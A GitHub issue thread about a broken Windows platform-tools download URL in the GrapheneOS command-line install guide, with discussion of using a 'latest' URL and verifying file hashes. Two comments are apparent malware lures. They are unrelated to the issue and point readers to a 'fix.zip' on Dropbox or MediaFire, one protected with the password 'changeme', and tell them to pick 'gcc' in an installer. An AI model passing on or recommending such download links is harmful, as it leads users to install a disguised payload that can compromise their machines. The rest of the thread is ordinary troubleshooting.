### ISSUE TITLE
CLI install instructions out of date - invalid URL to download platform-tools

### ISSUE THREAD

**Issue by e-t-l** [GrapheneOS/grapheneos.org#1004]
https://github.com/GrapheneOS/grapheneos.org/blob/main/static/install/cli.html#L255

> `curl -O https://dl.google.com/android/repository/platform-tools_r35.0.2-windows.zip`

This URL (fails to download, and navigating to the URL in a browser returns a 404 error. **Evidently it is only affecting the Windows package's URL.** ~~I would guess that "r35.0.2" is old enough that it is no longer available.~~ Consider using the always-latest URL:
"https://dl.google.com/android/repository/platform-tools-latest-windows.zip"
Extra logic would have to be included to confirm the hash. Either fetching the hash value from a trusted online source, or hosting it ourselves on Grapheneos.org.

I can create a PR if you want me to add in these updates, although I would need guidance from devs about:
1. Do you want to always use the "latest" version, or would you rather stick to a known-good version?
1a. Do you want to just host the platform-tools.zip files here on Github? That way you could keep using r35.0.2 and the CLI instructions would be happy with a hardcoded github URL.
2. If filehash values need to be fetched from online, what source would you prefer? 
2a. If you don't want to host them on Github, we could use VirusTotal, since that has hashes of pretty much every file in existence. There's probably other reputable repos of filehashes but I don't know any off the top of my head.

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by thestinger** [comment]
@e-t-l It's downloading fine for me.

**Comment by e-t-l** [comment]
Oh that's my fault for being lazy when copying lines from the html file. Apparently the linux one works fine, as does the mac one. What I initially tried was the Windows url, and THAT one failed to download. Updated my initial comment to reflect this.

https://dl.google.com/android/repository/platform-tools_r35.0.2-windows.zip

Does this URL work for you? Returns 404 error for me.

**Comment by e-t-l** [comment]
Edited my last commented to include the ACTUAL correct url that has the issue. Apologies for the errors, it's been a long day.
